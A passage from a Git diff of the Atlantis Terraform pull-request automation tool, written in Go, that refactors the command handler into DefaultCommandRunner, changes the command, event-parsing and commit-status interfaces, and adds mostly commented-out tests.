models.Repo, pullNum int) (models.PullRequest, models.Repo, error) { if c.GithubPullGetter == nil { return models.PullRequest{}, models.Repo{}, errors.New("Atlantis not configured to support GitHub") } @@ -111,14 +169,14 @@ func (c *CommandHandler) getGithubData(baseRepo models.Repo, pullNum int) (model if err != nil { return models.PullRequest{}, models.Repo{}, errors.Wrap(err, "making pull request API call to GitHub") } - pull, repo, err := c.EventParser.ParseGithubPull(ghPull) + pull, _, headRepo, err := c.EventParser.ParseGithubPull(ghPull) if err != nil { - return pull, repo, errors.Wrap(err, 
"extracting required fields from comment data") + return pull, headRepo, errors.Wrap(err, "extracting required fields from comment data") } - return pull, repo, nil + return pull, headRepo, nil } -func (c *CommandHandler) getGitlabData(baseRepo models.Repo, pullNum int) (models.PullRequest, error) { +func (c *DefaultCommandRunner) getGitlabData(baseRepo models.Repo, pullNum int) (models.PullRequest, error) { if c.GitlabMergeRequestGetter == nil { return models.PullRequest{}, errors.New("Atlantis not configured to support GitLab") } @@ -130,60 +188,47 @@ func (c *CommandHandler) getGitlabData(baseRepo models.Repo, pullNum int) (model return pull, nil } -func (c *CommandHandler) buildLogger(repoFullName string, pullNum int) *logging.SimpleLogger { +func (c *DefaultCommandRunner) buildLogger(repoFullName string, pullNum int) *logging.SimpleLogger { src := fmt.Sprintf("%s#%d", repoFullName, pullNum) return logging.NewSimpleLogger(src, c.Logger.Underlying(), true, c.Logger.GetLevel()) } -func (c *CommandHandler) run(ctx *CommandContext) { - defer c.logPanics(ctx) - +func (c *DefaultCommandRunner) validateCtxAndComment(ctx *CommandContext) bool { if !c.AllowForkPRs && ctx.HeadRepo.Owner != ctx.BaseRepo.Owner { ctx.Log.Info("command was run on a fork pull request which is disallowed") c.VCSClient.CreateComment(ctx.BaseRepo, ctx.Pull.Num, fmt.Sprintf("Atlantis commands can't be run on fork pull requests. 
To enable, set --%s", c.AllowForkPRsFlag)) // nolint: errcheck - return + return false } if ctx.Pull.State != models.Open { ctx.Log.Info("command was run on closed pull request") c.VCSClient.CreateComment(ctx.BaseRepo, ctx.Pull.Num, "Atlantis commands can't be run on closed pull requests") // nolint: errcheck + return false + } + return true +} + +func (c *DefaultCommandRunner) run(ctx *CommandContext, command CommandInterface, commandRunner func() ([]ProjectResult, error)) { + defer c.logPanics(ctx) + + if !c.validateCtxAndComment(ctx) { return } ctx.Log.Debug("updating commit status to pending") - if err := c.CommitStatusUpdater.Update(ctx.BaseRepo, ctx.Pull, vcs.Pending, ctx.Command); err != nil { + if err := c.CommitStatusUpdater.Update(ctx.BaseRepo, ctx.Pull, vcs.Pending, command.CommandName()); err != nil { ctx.Log.Warn("unable to update commit status: %s", err) } - if !c.AtlantisWorkspaceLocker.TryLock(ctx.BaseRepo.FullName, ctx.Command.Workspace, ctx.Pull.Num) { - errMsg := fmt.Sprintf( - "The %s workspace is currently locked by another"+ - " command that is running for this pull request."+ - " Wait until the previous command is complete and try again.", - ctx.Command.Workspace) - ctx.Log.Warn(errMsg) - c.updatePull(ctx, CommandResponse{Failure: errMsg}) - return - } - ctx.Log.Debug("successfully acquired workspace lock") - defer c.AtlantisWorkspaceLocker.Unlock(ctx.BaseRepo.FullName, ctx.Command.Workspace, ctx.Pull.Num) - var cr CommandResponse - switch ctx.Command.Name { - case Plan: - if ctx.Command.Autoplan { - cr = c.PullRequestOperator.Autoplan(ctx) - } else { - cr = c.PullRequestOperator.PlanViaComment(ctx) - } - case Apply: - cr = c.PullRequestOperator.ApplyViaComment(ctx) - default: - ctx.Log.Err("failed to determine desired command, neither plan nor apply") + results, err := commandRunner() + if err != nil { + c.updatePull(ctx, command, CommandResult{Error: err}) + return } - c.updatePull(ctx, cr) + c.updatePull(ctx, command, 
CommandResult{ProjectResults: results}) } -func (c *CommandHandler) updatePull(ctx *CommandContext, res CommandResponse) { +func (c *DefaultCommandRunner) updatePull(ctx *CommandContext, command CommandInterface, res CommandResult) { // Log if we got any errors or failures. if res.Error != nil { ctx.Log.Err(res.Error.Error()) @@ -192,15 +237,15 @@ func (c *CommandHandler) updatePull(ctx *CommandContext, res CommandResponse) { } // Update the pull request's status icon and comment back. - if err := c.CommitStatusUpdater.UpdateProjectResult(ctx, res); err != nil { + if err := c.CommitStatusUpdater.UpdateProjectResult(ctx, command.CommandName(), res); err != nil { ctx.Log.Warn("unable to update commit status: %s", err) } - comment := c.MarkdownRenderer.Render(res, ctx.Command.Name, ctx.Log.History.String(), ctx.Command.Verbose, ctx.Command.Autoplan) + comment := c.MarkdownRenderer.Render(res, command.CommandName(), ctx.Log.History.String(), command.IsVerbose(), command.IsAutoplan()) c.VCSClient.CreateComment(ctx.BaseRepo, ctx.Pull.Num, comment) // nolint: errcheck } // logPanics logs and creates a comment on the pull request for panics. -func (c *CommandHandler) logPanics(ctx *CommandContext) { +func (c *DefaultCommandRunner) logPanics(ctx *CommandContext) { if err := recover(); err != nil { stack := recovery.Stack(3) c.VCSClient.CreateComment(ctx.BaseRepo, ctx.Pull.Num, // nolint: errcheck diff --git a/server/events/command_runner_test.go b/server/events/command_runner_test.go new file mode 100644 index 0000000000..a0d636c9a8 --- /dev/null +++ b/server/events/command_runner_test.go @@ -0,0 +1,239 @@ +// Copyright 2017 HootSuite Media Inc. +// +// Licensed under the Apache License, Version 2.0 (the License); +// you may not use this file except in compliance with the License. 
+// You may obtain a copy of the License at +// http://www.apache.org/licenses/LICENSE-2.0 +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an AS IS BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// Modified hereafter by contributors to runatlantis/atlantis. +// +package events_test + +import ( + "bytes" + "log" + "testing" + + . "github.com/petergtz/pegomock" + "github.com/runatlantis/atlantis/server/events" + "github.com/runatlantis/atlantis/server/events/mocks" + vcsmocks "github.com/runatlantis/atlantis/server/events/vcs/mocks" + logmocks "github.com/runatlantis/atlantis/server/logging/mocks" + //. "github.com/runatlantis/atlantis/testing" +) + +var projectCommandBuilder *mocks.MockProjectCommandBuilder +var eventParsing *mocks.MockEventParsing +var vcsClient *vcsmocks.MockClientProxy +var ghStatus *mocks.MockCommitStatusUpdater +var githubGetter *mocks.MockGithubPullGetter +var gitlabGetter *mocks.MockGitlabMergeRequestGetter +var workspaceLocker *mocks.MockAtlantisWorkspaceLocker +var ch events.DefaultCommandRunner +var logBytes *bytes.Buffer + +func setup(t *testing.T) { + RegisterMockTestingT(t) + projectCommandBuilder = mocks.NewMockProjectCommandBuilder() + eventParsing = mocks.NewMockEventParsing() + ghStatus = mocks.NewMockCommitStatusUpdater() + workspaceLocker = mocks.NewMockAtlantisWorkspaceLocker() + vcsClient = vcsmocks.NewMockClientProxy() + githubGetter = mocks.NewMockGithubPullGetter() + gitlabGetter = mocks.NewMockGitlabMergeRequestGetter() + logger := logmocks.NewMockSimpleLogging() + logBytes = new(bytes.Buffer) + When(logger.Underlying()).ThenReturn(log.New(logBytes, "", 0)) + ch = events.DefaultCommandRunner{ + VCSClient: vcsClient, + CommitStatusUpdater: ghStatus, + EventParser: eventParsing, + MarkdownRenderer: 
&events.MarkdownRenderer{}, + GithubPullGetter: githubGetter, + GitlabMergeRequestGetter: gitlabGetter, + Logger: logger, + AllowForkPRs: false, + AllowForkPRsFlag: "allow-fork-prs-flag", + ProjectCommandBuilder: projectCommandBuilder, + } +} + +//func TestExecuteCommand_LogPanics(t *testing.T) { +// t.Log("if there is a panic it is commented back on the pull request") +// setup(t) +// ch.AllowForkPRs = true // Lets us get to the panic code. +// defer func() { ch.AllowForkPRs = false }() +// When(ghStatus.Update(fixtures.GithubRepo, fixtures.Pull, vcs.Pending, events.Plan)).ThenPanic("panic") +// ch.RunCommentCommand(fixtures.GithubRepo, &fixtures.GithubRepo, fixtures.User, 1, nil) +// _, _, comment := vcsClient.VerifyWasCalledOnce().CreateComment(matchers.AnyModelsRepo(), AnyInt(), AnyString()).GetCapturedArguments() +// Assert(t, strings.Contains(comment, "Error: goroutine panic"), "comment should be about a goroutine panic") +//} +// +//func TestExecuteCommand_NoGithubPullGetter(t *testing.T) { +// t.Log("if DefaultCommandRunner was constructed with a nil GithubPullGetter an error should be logged") +// setup(t) +// ch.GithubPullGetter = nil +// ch.RunCommentCommand(fixtures.GithubRepo, &fixtures.GithubRepo, fixtures.User, 1, nil) +// Equals(t, "[ERROR] runatlantis/atlantis#1: Atlantis not configured to support GitHub\n", logBytes.String()) +//} +// +//func TestExecuteCommand_NoGitlabMergeGetter(t *testing.T) { +// t.Log("if DefaultCommandRunner was constructed with a nil GitlabMergeRequestGetter an error should be logged") +// setup(t) +// ch.GitlabMergeRequestGetter = nil +// ch.RunCommentCommand(fixtures.GitlabRepo, &fixtures.GitlabRepo, fixtures.User, 1, nil) +// Equals(t, "[ERROR] runatlantis/atlantis#1: Atlantis not configured to support GitLab\n", logBytes.String()) +//} +// +//func TestExecuteCommand_GithubPullErr(t *testing.T) { +// t.Log("if getting the github pull request fails an error should be logged") +// setup(t) +// 
When(githubGetter.GetPullRequest(fixtures.GithubRepo, fixtures.Pull.Num)).ThenReturn(nil, errors.New("err")) +// ch.RunCommentCommand(fixtures.GithubRepo, &fixtures.GithubRepo, fixtures.User, fixtures.Pull.Num, nil) +// Equals(t, "[ERROR] runatlantis/atlantis#1: Making pull request API call to GitHub: err\n", logBytes.String()) +//} +// +//func TestExecuteCommand_GitlabMergeRequestErr(t *testing.T) { +// t.Log("if getting the gitlab merge request fails an error should be logged") +// setup(t) +// When(gitlabGetter.GetMergeRequest(fixtures.GithubRepo.FullName, fixtures.Pull.Num)).ThenReturn(nil, errors.New("err")) +// ch.RunCommentCommand(fixtures.GitlabRepo, &fixtures.GitlabRepo, fixtures.User, fixtures.Pull.Num, nil) +// Equals(t, "[ERROR] runatlantis/atlantis#1: Making merge request API call to GitLab: err\n", logBytes.String()) +//} +// +//func TestExecuteCommand_GithubPullParseErr(t *testing.T) { +// t.Log("if parsing the returned github pull request fails an error should be logged") +// setup(t) +// var pull github.PullRequest +// When(githubGetter.GetPullRequest(fixtures.GithubRepo, fixtures.Pull.Num)).ThenReturn(&pull, nil) +// When(eventParsing.ParseGithubPull(&pull)).ThenReturn(fixtures.Pull, fixtures.GithubRepo, errors.New("err")) +// +// ch.RunCommentCommand(fixtures.GithubRepo, &fixtures.GithubRepo, fixtures.User, fixtures.Pull.Num, nil) +// Equals(t, "[ERROR] runatlantis/atlantis#1: Extracting required fields from comment data: err\n", logBytes.String()) +//} +// +//func TestExecuteCommand_ForkPRDisabled(t *testing.T) { +// t.Log("if a command is run on a forked pull request and this is disabled atlantis should" + +// " comment saying that this is not allowed") +// setup(t) +// ch.AllowForkPRs = false // by default it's false so don't need to reset +// var pull github.PullRequest +// modelPull := models.PullRequest{State: models.Open} +// When(githubGetter.GetPullRequest(fixtures.GithubRepo, fixtures.Pull.Num)).ThenReturn(&pull, nil) +// +// headRepo 
:= fixtures.GithubRepo +// headRepo.FullName = "forkrepo/atlantis" +// headRepo.Owner = "forkrepo" +// When(eventParsing.ParseGithubPull(&pull)).ThenReturn(modelPull, headRepo, nil) +// +// ch.RunCommentCommand(fixtures.GithubRepo, nil, fixtures.User, fixtures.Pull.Num, nil) +// vcsClient.VerifyWasCalledOnce().CreateComment(fixtures.GithubRepo, modelPull.Num, "Atlantis commands can't be run on fork pull requests. To enable, set --"+ch.AllowForkPRsFlag) +//} +// +//func TestExecuteCommand_ClosedPull(t *testing.T) { +// t.Log("if a command is run on a closed pull request atlantis should" + +// " comment saying that this is not allowed") +// setup(t) +// pull := &github.PullRequest{ +// State: github.String("closed"), +// } +// modelPull := models.PullRequest{State: models.Closed} +// When(githubGetter.GetPullRequest(fixtures.GithubRepo, fixtures.Pull.Num)).ThenReturn(pull, nil) +// When(eventParsing.ParseGithubPull(pull)).ThenReturn(modelPull, fixtures.GithubRepo, nil) +// +// ch.RunCommentCommand(fixtures.GithubRepo, &fixtures.GithubRepo, fixtures.User, fixtures.Pull.Num, nil) +// vcsClient.VerifyWasCalledOnce().CreateComment(fixtures.GithubRepo, modelPull.Num, "Atlantis commands can't be run on closed pull requests") +//} +// +//func TestExecuteCommand_WorkspaceLocked(t *testing.T) { +// t.Log("if the workspace is locked, should comment back on the pull") +// setup(t) +// pull := &github.PullRequest{ +// State: github.String("closed"), +// } +// cmd := events.CommentCommand{ +// Name: events.Plan, +// Workspace: "workspace", +// } +// +// When(githubGetter.GetPullRequest(fixtures.GithubRepo, fixtures.Pull.Num)).ThenReturn(pull, nil) +// When(eventParsing.ParseGithubPull(pull)).ThenReturn(fixtures.Pull, fixtures.GithubRepo, nil) +// When(workspaceLocker.TryLock(fixtures.GithubRepo.FullName, cmd.Workspace, fixtures.Pull.Num)).ThenReturn(false) +// ch.RunCommentCommand(fixtures.GithubRepo, &fixtures.GithubRepo, fixtures.User, fixtures.Pull.Num, &cmd) +// +// msg := 
"The workspace workspace is currently locked by another" + +// " command that is running for this pull request." + +// " Wait until the previous command is complete and try again." +// ghStatus.VerifyWasCalledOnce().Update(fixtures.GithubRepo, fixtures.Pull, vcs.Pending, cmd.CommandName()) +// _, _, result := ghStatus.VerifyWasCalledOnce().UpdateProjectResult(matchers.AnyPtrToEventsCommandContext(), matchers.AnyEventsCommandName(), matchers.AnyEventsCommandResult()).GetCapturedArguments() +// Equals(t, msg, result.Failure) +// vcsClient.VerifyWasCalledOnce().CreateComment(fixtures.GithubRepo, fixtures.Pull.Num, +// "**Plan Failed**: "+msg+"\n\n") +//} +// +//func TestExecuteCommand_FullRun(t *testing.T) { +// t.Log("when running a plan, apply should comment") +// pull := &github.PullRequest{ +// State: github.String("closed"), +// } +// cmdResult := events.CommandResult{} +// for _, c := range []events.CommandName{events.Plan, events.Apply} { +// setup(t) +// cmd := events.CommentCommand{ +// Name: c, +// Workspace: "workspace", +// } +// When(githubGetter.GetPullRequest(fixtures.GithubRepo, fixtures.Pull.Num)).ThenReturn(pull, nil) +// When(eventParsing.ParseGithubPull(pull)).ThenReturn(fixtures.Pull, fixtures.GithubRepo, nil) +// When(workspaceLocker.TryLock(fixtures.GithubRepo.FullName, cmd.Workspace, fixtures.Pull.Num)).ThenReturn(true) +// switch c { +// case events.Plan: +// When(projectCommandBuilder.PlanViaComment(matchers.AnyPtrToEventsCommandContext())).ThenReturn(cmdResult) +// case events.Apply: +// When(projectCommandBuilder.ApplyViaComment(matchers.AnyPtrToEventsCommandContext())).ThenReturn(cmdResult) +// } +// +// ch.RunCommentCommand(fixtures.GithubRepo, fixtures.GithubRepo, fixtures.User, fixtures.Pull.Num, &cmd) +// +// ghStatus.VerifyWasCalledOnce().Update(fixtures.GithubRepo, fixtures.Pull, vcs.Pending, &cmd) +// _, response := ghStatus.VerifyWasCalledOnce().UpdateProjectResult(matchers.AnyPtrToEventsCommandContext(), 
matchers.AnyEventsCommandResult()).GetCapturedArguments() +// Equals(t, cmdResult, response) +// vcsClient.VerifyWasCalledOnce().CreateComment(matchers.AnyModelsRepo(), AnyInt(), AnyString()) +// workspaceLocker.VerifyWasCalledOnce().Unlock(fixtures.GithubRepo.FullName, cmd.Workspace, fixtures.Pull.Num) +// } +//} +// +//func TestExecuteCommand_ForkPREnabled(t *testing.T) { +// t.Log("when running a plan on a fork PR, it should succeed") +// setup(t) +// +// // Enable forked PRs. +// ch.AllowForkPRs = true +// defer func() { ch.AllowForkPRs = false }() // Reset after test. +// +// var pull github.PullRequest +// cmdResponse := events.CommandResult{} +// cmd := events.CommentCommand{ +// Name: events.Plan, +// Workspace: "workspace", +// } +// When(githubGetter.GetPullRequest(fixtures.GithubRepo, fixtures.Pull.Num)).ThenReturn(&pull, nil) +// headRepo := fixtures.GithubRepo +// headRepo.FullName = "forkrepo/atlantis" +// headRepo.Owner = "forkrepo" +// When(eventParsing.ParseGithubPull(&pull)).ThenReturn(fixtures.Pull, headRepo, nil) +// When(workspaceLocker.TryLock(fixtures.GithubRepo.FullName, cmd.Workspace, fixtures.Pull.Num)).ThenReturn(true) +// When(projectCommandBuilder.PlanViaComment(matchers.AnyPtrToEventsCommandContext())).ThenReturn(cmdResponse) +// +// ch.RunCommentCommand(fixtures.GithubRepo, models.Repo{} /* this isn't used */, fixtures.User, fixtures.Pull.Num, &cmd) +// +// ghStatus.VerifyWasCalledOnce().Update(fixtures.GithubRepo, fixtures.Pull, vcs.Pending, &cmd) +// _, response := ghStatus.VerifyWasCalledOnce().UpdateProjectResult(matchers.AnyPtrToEventsCommandContext(), matchers.AnyEventsCommandResult()).GetCapturedArguments() +// Equals(t, cmdResponse, response) +// vcsClient.VerifyWasCalledOnce().CreateComment(matchers.AnyModelsRepo(), AnyInt(), AnyString()) +// workspaceLocker.VerifyWasCalledOnce().Unlock(fixtures.GithubRepo.FullName, cmd.Workspace, fixtures.Pull.Num) +//} diff --git a/server/events/comment_parser.go 
b/server/events/comment_parser.go index 808d4493a9..c6f9f24395 100644 --- a/server/events/comment_parser.go +++ b/server/events/comment_parser.go @@ -59,7 +59,7 @@ type CommentParser struct { type CommentParseResult struct { // Command is the successfully parsed command. Will be nil if // CommentResponse or Ignore is set. - Command *Command + Command *CommentCommand // CommentResponse is set when we should respond immediately to the command // for example for atlantis help. CommentResponse string @@ -215,7 +215,7 @@ func (e *CommentParser) Parse(comment string, vcsHost models.VCSHostType) Commen } return CommentParseResult{ - Command: NewCommand(dir, extraArgs, name, verbose, workspace, project, false), + Command: NewCommand(dir, extraArgs, name, verbose, workspace, project), } } diff --git a/server/events/commit_status_updater.go b/server/events/commit_status_updater.go index 3debcd43fe..ba5a235036 100644 --- a/server/events/commit_status_updater.go +++ b/server/events/commit_status_updater.go @@ -27,10 +27,10 @@ import ( // the status to signify whether the plan/apply succeeds. type CommitStatusUpdater interface { // Update updates the status of the head commit of pull. - Update(repo models.Repo, pull models.PullRequest, status vcs.CommitStatus, cmd *Command) error + Update(repo models.Repo, pull models.PullRequest, status vcs.CommitStatus, command CommandName) error // UpdateProjectResult updates the status of the head commit given the // state of response. - UpdateProjectResult(ctx *CommandContext, res CommandResponse) error + UpdateProjectResult(ctx *CommandContext, commandName CommandName, res CommandResult) error } // DefaultCommitStatusUpdater implements CommitStatusUpdater. @@ -39,13 +39,13 @@ type DefaultCommitStatusUpdater struct { } // Update updates the commit status. 
-func (d *DefaultCommitStatusUpdater) Update(repo models.Repo, pull models.PullRequest, status vcs.CommitStatus, cmd *Command) error { - description := fmt.Sprintf("%s %s", strings.Title(cmd.Name.String()), strings.Title(status.String())) +func (d *DefaultCommitStatusUpdater) Update(repo models.Repo, pull models.PullRequest, status vcs.CommitStatus, command CommandName) error { + description := fmt.Sprintf("%s %s", strings.Title(command.String()), strings.Title(status.String())) return d.Client.UpdateStatus(repo, pull, status, description) } // UpdateProjectResult updates the commit status based on the status of res. -func (d *DefaultCommitStatusUpdater) UpdateProjectResult(ctx *CommandContext, res CommandResponse) error { +func (d *DefaultCommitStatusUpdater) UpdateProjectResult(ctx *CommandContext, commandName CommandName, res CommandResult) error { var status vcs.CommitStatus if res.Error != nil || res.Failure != "" { status = vcs.Failed @@ -56,7 +56,7 @@ func (d *DefaultCommitStatusUpdater) UpdateProjectResult(ctx *CommandContext, re } status = d.worstStatus(statuses) } - return d.Update(ctx.BaseRepo, ctx.Pull, status, ctx.Command) + return d.Update(ctx.BaseRepo, ctx.Pull, status, commandName) } func (d *DefaultCommitStatusUpdater) worstStatus(ss []vcs.CommitStatus) vcs.CommitStatus { diff --git a/server/events/commit_status_updater_test.go b/server/events/commit_status_updater_test.go index 7d05264b04..155822dc19 100644 --- a/server/events/commit_status_updater_test.go +++ b/server/events/commit_status_updater_test.go @@ -29,26 +29,12 @@ import ( var repoModel = models.Repo{} var pullModel = models.PullRequest{} var status = vcs.Success -var cmd = events.Command{ - Name: events.Plan, -} - -func TestStatus_String(t *testing.T) { - cases := map[vcs.CommitStatus]string{ - vcs.Pending: "pending", - vcs.Success: "success", - vcs.Failed: "failed", - } - for k, v := range cases { - Equals(t, v, k.String()) - } -} func TestUpdate(t *testing.T) { 
RegisterMockTestingT(t) client := mocks.NewMockClientProxy() s := events.DefaultCommitStatusUpdater{Client: client} - err := s.Update(repoModel, pullModel, status, &cmd) + err := s.Update(repoModel, pullModel, status, events.Plan) Ok(t, err) client.VerifyWasCalledOnce().UpdateStatus(repoModel, pullModel, status, "Plan Success") } @@ -58,11 +44,10 @@ func TestUpdateProjectResult_Error(t *testing.T) { ctx := &events.CommandContext{ BaseRepo: repoModel, Pull: pullModel, - Command: &events.Command{Name: events.Plan}, } client := mocks.NewMockClientProxy() s := events.DefaultCommitStatusUpdater{Client: client} - err := s.UpdateProjectResult(ctx, events.CommandResponse{Error: errors.New("err")}) + err := s.UpdateProjectResult(ctx, events.Plan, events.CommandResult{Error: errors.New("err")}) Ok(t, err) client.VerifyWasCalledOnce().UpdateStatus(repoModel, pullModel, vcs.Failed, "Plan Failed") } @@ -72,23 +57,20 @@ func TestUpdateProjectResult_Failure(t *testing.T) { ctx := &events.CommandContext{ BaseRepo: repoModel, Pull: pullModel, - Command: &events.Command{Name: events.Plan}, } client := mocks.NewMockClientProxy() s := events.DefaultCommitStatusUpdater{Client: client} - err := s.UpdateProjectResult(ctx, events.CommandResponse{Failure: "failure"}) + err := s.UpdateProjectResult(ctx, events.Plan, events.CommandResult{Failure: "failure"}) Ok(t, err) client.VerifyWasCalledOnce().UpdateStatus(repoModel, pullModel, vcs.Failed, "Plan Failed") } func TestUpdateProjectResult(t *testing.T) { - t.Log("should use worst status") RegisterMockTestingT(t) ctx := &events.CommandContext{ BaseRepo: repoModel, Pull: pullModel, - Command: &events.Command{Name: events.Plan}, } cases := []struct { @@ -126,25 +108,31 @@ func TestUpdateProjectResult(t *testing.T) { } for _, c := range cases { - var results []events.ProjectResult - for _, statusStr := range c.Statuses { - var result events.ProjectResult - switch statusStr { - case "failure": - result = events.ProjectResult{Failure: "failure"} - 
case "error": - result = events.ProjectResult{Error: errors.New("err")} - default: - result = events.ProjectResult{} + t.Run(strings.Join(c.Statuses, "-"), func(t *testing.T) { + var results []events.ProjectResult + for _, statusStr := range c.Statuses { + var result events.ProjectResult + switch statusStr { + case "failure": + result = events.ProjectResult{ + ProjectCommandResult: events.ProjectCommandResult{Failure: "failure"}, + } + case "error": + result = events.ProjectResult{ + ProjectCommandResult: events.ProjectCommandResult{Error: errors.New("err")}, + } + default: + result = events.ProjectResult{} + } + results = append(results, result) } - results = append(results, result) - } - resp := events.CommandResponse{ProjectResults: results} + resp := events.CommandResult{ProjectResults: results} - client := mocks.NewMockClientProxy() - s := events.DefaultCommitStatusUpdater{Client: client} - err := s.UpdateProjectResult(ctx, resp) - Ok(t, err) - client.VerifyWasCalledOnce().UpdateStatus(repoModel, pullModel, c.Expected, "Plan "+strings.Title(c.Expected.String())) + client := mocks.NewMockClientProxy() + s := events.DefaultCommitStatusUpdater{Client: client} + err := s.UpdateProjectResult(ctx, events.Plan, resp) + Ok(t, err) + client.VerifyWasCalledOnce().UpdateStatus(repoModel, pullModel, c.Expected, "Plan "+strings.Title(c.Expected.String())) + }) } } diff --git a/server/events/event_parser.go b/server/events/event_parser.go index dbdccc8e50..3bf4e7f157 100644 --- a/server/events/event_parser.go +++ b/server/events/event_parser.go @@ -34,7 +34,27 @@ var multiLineRegex = regexp.MustCompile(`.*\r?\n.+`) //go:generate pegomock generate -m --use-experimental-model-gen --package mocks -o mocks/mock_event_parsing.go EventParsing -type Command struct { +type CommandInterface interface { + CommandName() CommandName + IsVerbose() bool + IsAutoplan() bool +} + +type AutoplanCommand struct{} + +func (c AutoplanCommand) CommandName() CommandName { + return Plan +} + +func 
(c AutoplanCommand) IsVerbose() bool { + return false +} + +func (c AutoplanCommand) IsAutoplan() bool { + return true +} + +type CommentCommand struct { // Dir is the path relative to the repo root to run the command in. // Will never be an empty string and will never end in "/". Dir string @@ -44,20 +64,29 @@ type Command struct { Name CommandName Verbose bool Workspace string - // Autoplan is true if the command is a plan command being executed in an - // attempt to automatically run plan. - Autoplan bool // ProjectName is the name of a project to run the command on. It refers to a // project specified in an atlantis.yaml file. ProjectName string } -func (c Command) String() string { - return fmt.Sprintf("command=%q verbose=%t dir=%q workspace=%q project=%q autoplan=%t flags=%q", c.Name.String(), c.Verbose, c.Dir, c.Workspace, c.ProjectName, c.Autoplan, strings.Join(c.Flags, ",")) +func (c CommentCommand) CommandName() CommandName { + return c.Name +} + +func (c CommentCommand) IsVerbose() bool { + return c.Verbose +} + +func (c CommentCommand) IsAutoplan() bool { + return false +} + +func (c CommentCommand) String() string { + return fmt.Sprintf("command=%q verbose=%t dir=%q workspace=%q project=%q flags=%q", c.Name.String(), c.Verbose, c.Dir, c.Workspace, c.ProjectName, strings.Join(c.Flags, ",")) } // NewCommand constructs a Command, setting all missing fields to defaults. -func NewCommand(dir string, flags []string, name CommandName, verbose bool, workspace string, project string, autoplan bool) *Command { +func NewCommand(dir string, flags []string, name CommandName, verbose bool, workspace string, project string) *CommentCommand { // If dir was an empty string, this will return '.'. 
validDir := path.Clean(dir) if validDir == "/" { @@ -66,24 +95,27 @@ func NewCommand(dir string, flags []string, name CommandName, verbose bool, work if workspace == "" { workspace = DefaultWorkspace } - return &Command{ + return &CommentCommand{ Dir: validDir, Flags: flags, Name: name, Verbose: verbose, Workspace: workspace, - Autoplan: autoplan, ProjectName: project, } } type EventParsing interface { ParseGithubIssueCommentEvent(comment *github.IssueCommentEvent) (baseRepo models.Repo, user models.User, pullNum int, err error) - // ParseGithubPull returns the pull request and head repo. - ParseGithubPull(pull *github.PullRequest) (models.PullRequest, models.Repo, error) + // ParseGithubPull returns the pull request, base repo and head repo. + ParseGithubPull(pull *github.PullRequest) (models.PullRequest, models.Repo, models.Repo, error) + // ParseGithubPullEvent returns the pull request, head repo and user that + // caused the event. Base repo is available as a field on PullRequest. + ParseGithubPullEvent(pullEvent *github.PullRequestEvent) (pull models.PullRequest, baseRepo models.Repo, headRepo models.Repo, user models.User, err error) ParseGithubRepo(ghRepo *github.Repository) (models.Repo, error) - // ParseGitlabMergeEvent returns the pull request, base repo and head repo. - ParseGitlabMergeEvent(event gitlab.MergeEvent) (models.PullRequest, models.Repo, models.Repo, error) + // ParseGitlabMergeEvent returns the pull request, base repo, head repo and + // user that caused the event. 
+ ParseGitlabMergeEvent(event gitlab.MergeEvent) (models.PullRequest, models.Repo, models.Repo, models.User, error) ParseGitlabMergeCommentEvent(event gitlab.MergeCommentEvent) (baseRepo models.Repo, headRepo models.Repo, user models.User, err error) ParseGitlabMergeRequest(mr *gitlab.MergeRequest, baseRepo models.Repo) models.PullRequest } @@ -116,38 +148,58 @@ func (e *EventParser) ParseGithubIssueCommentEvent(comment *github.IssueCommentE return } -func (e *EventParser) ParseGithubPull(pull *github.PullRequest) (models.PullRequest, models.Repo, error) { - var pullModel models.PullRequest - var headRepoModel models.Repo +func (e *EventParser) ParseGithubPullEvent(pullEvent *github.PullRequestEvent) (models.PullRequest, models.Repo, models.Repo, models.User, error) { + if pullEvent.PullRequest == nil { + return models.PullRequest{}, models.Repo{}, models.Repo{}, models.User{}, errors.New("pull_request is null") + } + pull, baseRepo, headRepo, err := e.ParseGithubPull(pullEvent.PullRequest) + if err != nil { + return models.PullRequest{}, models.Repo{}, models.Repo{}, models.User{}, err + } + if pullEvent.Sender == nil { + return models.PullRequest{}, models.Repo{}, models.Repo{}, models.User{}, errors.New("sender is null") + } + senderUsername := pullEvent.Sender.GetLogin() + if senderUsername == "" { + return models.PullRequest{}, models.Repo{}, models.Repo{}, models.User{}, errors.New("sender.login is null") + } + return pull, baseRepo, headRepo, models.User{Username: senderUsername}, nil +} +func (e *EventParser) ParseGithubPull(pull *github.PullRequest) (pullModel models.PullRequest, baseRepo models.Repo, headRepo models.Repo, err error) { commit := pull.Head.GetSHA() if commit == "" { - return pullModel, headRepoModel, errors.New("head.sha is null") + err = errors.New("head.sha is null") + return } url := pull.GetHTMLURL() if url == "" { - return pullModel, headRepoModel, errors.New("html_url is null") + err = errors.New("html_url is null") + return } branch 
:= pull.Head.GetRef() if branch == "" { - return pullModel, headRepoModel, errors.New("head.ref is null") + err = errors.New("head.ref is null") + return } authorUsername := pull.User.GetLogin() if authorUsername == "" { - return pullModel, headRepoModel, errors.New("user.login is null") + err = errors.New("user.login is null") + return } num := pull.GetNumber() if num == 0 { - return pullModel, headRepoModel, errors.New("number is null") + err = errors.New("number is null") + return } - baseRepoModel, err := e.ParseGithubRepo(pull.Base.Repo) + baseRepo, err = e.ParseGithubRepo(pull.Base.Repo) if err != nil { - return pullModel, headRepoModel, err + return } - headRepoModel, err = e.ParseGithubRepo(pull.Head.Repo) + headRepo, err = e.ParseGithubRepo(pull.Head.Repo) if err != nil { - return pullModel, headRepoModel, err + return } pullState := models.Closed @@ -155,22 +207,23 @@ func (e *EventParser) ParseGithubPull(pull *github.PullRequest) (models.PullRequ pullState = models.Open } - return models.PullRequest{ + pullModel = models.PullRequest{ Author: authorUsername, Branch: branch, HeadCommit: commit, URL: url, Num: num, State: pullState, - BaseRepo: baseRepoModel, - }, headRepoModel, nil + BaseRepo: baseRepo, + } + return } func (e *EventParser) ParseGithubRepo(ghRepo *github.Repository) (models.Repo, error) { return models.NewRepo(models.Github, ghRepo.GetFullName(), ghRepo.GetCloneURL(), e.GithubUser, e.GithubToken) } -func (e *EventParser) ParseGitlabMergeEvent(event gitlab.MergeEvent) (models.PullRequest, models.Repo, models.Repo, error) { +func (e *EventParser) ParseGitlabMergeEvent(event gitlab.MergeEvent) (models.PullRequest, models.Repo, models.Repo, models.User, error) { modelState := models.Closed if event.ObjectAttributes.State == gitlabPullOpened { modelState = models.Open @@ -180,11 +233,11 @@ func (e 